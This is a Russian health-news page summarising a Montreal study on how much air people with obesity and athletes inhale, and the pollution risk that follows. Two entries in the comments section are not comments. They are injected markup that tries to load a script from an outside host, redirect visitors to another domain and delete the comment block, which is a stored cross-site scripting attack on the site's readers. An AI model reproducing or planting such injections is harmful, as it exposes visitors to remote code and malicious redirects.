Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Футболистам и толстым люд...  >>  Футболистам и толстым людям опасно дышать
 
Обратная связь
 

Футболистам и толстым людям опасно дышать

Размер шрифта
27 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Люди с лишним весом и ожирением вдыхают на 7-50% больше воздуха, чем их товарищи с нормальным весом. Поэтому толстякам больше грозят легочные заболевания, связанные с загрязнением воздуха.

Футболистам и толстым людям опасно дышать

Люди с ожирением 2 степени в день вдыхают около 24,6 м3 воздуха, а люди с нормальным весом – 16,4 м3 , то есть на 8,2 м3 меньше. Вместе с воздухом полные люди вдыхают и больше загрязняющих веществ. Ожирение 2 степени диагностируется, если ИМТ (индекс массы тела) человека составляет 35-40. Дети с избыточным весом или ожирением в день вдыхают на 10-24% воздуха больше нормы. Для детей диагностика ожирения несколько отличается.

В воздухе содержатся различные загрязняющие вещества, а именно аммиак, двуокись серы, озон, двуокись азота и многие другие. Все эти вещества раздражают ткани дыхательной системы.

Наша сборная в опасности?!

Постойте! Ведь спортсмены также вдыхают больше воздуха, чем остальные люди! Неужели и они находятся в зоне риска? В 2006 году доктор Брошу опубликовал следующие данные. Человеку, покоряющему Эверест, необходимо 19,8 м3 воздуха в день, лыжнику, преодолевающему длинные дистанции – 41,2 м3 в день, а велосипедисту, участвующему в Тур де Франс, – 45,9 м3 в день. Разумеется, такая потребность в воздухе у спортсменов развивается лишь во время соревнований, а не в обычной жизни.

В ходе исследования у половины людей с ожирением 2 типа потребность в воздухе составляла 24,6-55 м3 в день, однако, в отличие от спортсменов, эти цифры у них сохраняются изо дня в день в течение всей жизни. Поэтому опасность от вдыхаемых веществ у полных людей гораздо выше, чем даже у самых лучших спортсменов.

В исследовании изучались данные 1 069 пациентов с избыточной массой тела и ожирением и 902 человека с нормальным весом. Участники на основе показателя ИМТ были распределены по следующим категориям:

  • Нормальный вес – 18,5-25 кг/м2
  • Избыточная масса тела – 25-30 кг/м2
  • Ожирение 1 степени – 30-35 кг/м2
  • Ожирение 2 степени – 35-40 кг/м2
  • Ожирение 3 степени – более 40 кг/м2

Количество вдыхаемого воздуха регистрировалось с помощью меченых атомов (дейтерия и изотопов кислорода), обнаруживаемых в моче в совокупности за период более 16 000 дней. Меченые атомы использовались для регистрации количества выдыхаемого углекислого газа участников в различных жизненных ситуациях каждую минуту, 24 часа в сутки, в период от 7 до 21 дня.

Выше ли риск у детей?

Согласно результатам доктора Брошу, ситуация у детей с ожирением может быть еще более удручающей. Дело в том, что скорость обмена веществ у детей выше, чем у взрослых, поэтому они вдыхают больший объем воздуха на килограмм массы тела. То же самое можно сказать и о мужчинах – они вдыхают больше воздуха, чем женщины с той же массой тела.

Доктор Брошу полагает, что необходимо проведение новых исследований, чтобы выяснить, является ли вдыхание значительного объема воздуха у людей, больных ожирением, фактором риска астмы и других заболеваний дыхательной системы.

Хотите узнать больше о лишнем весе, его причинах, способах борьбы и многом другом о похудании? Читайте наш спецпроект «Сбрось лишнее».

Исследование было проведено под руководством доктора Пьера Брошу из Школы общественного здоровья Университета Монреаля.

Статья опубликована на основании данных, предоставленных Университетом Монреаля в 2013 году.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:37

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Как уменьшить жир на лице?   Пассивное курение приводит к ожирению!   Как ваши подруги мешают вам худеть!   Как контролировать количество жира в теле  
15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз! 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 
05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная? 28 мая 2013Бактерии спасут человечество от ожирения! Новый метод похудения от гарвардских ученых
 

Слайдшоу

1
Супереда для быстрого похудения
Как похудеть ленивой?
Как похудеть быстрее подруги?

Тесты

1
Знаете ли вы, как работает ваш желудок?
Есть ли у вас избыточный вес?
Правильно ли вы худеете?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.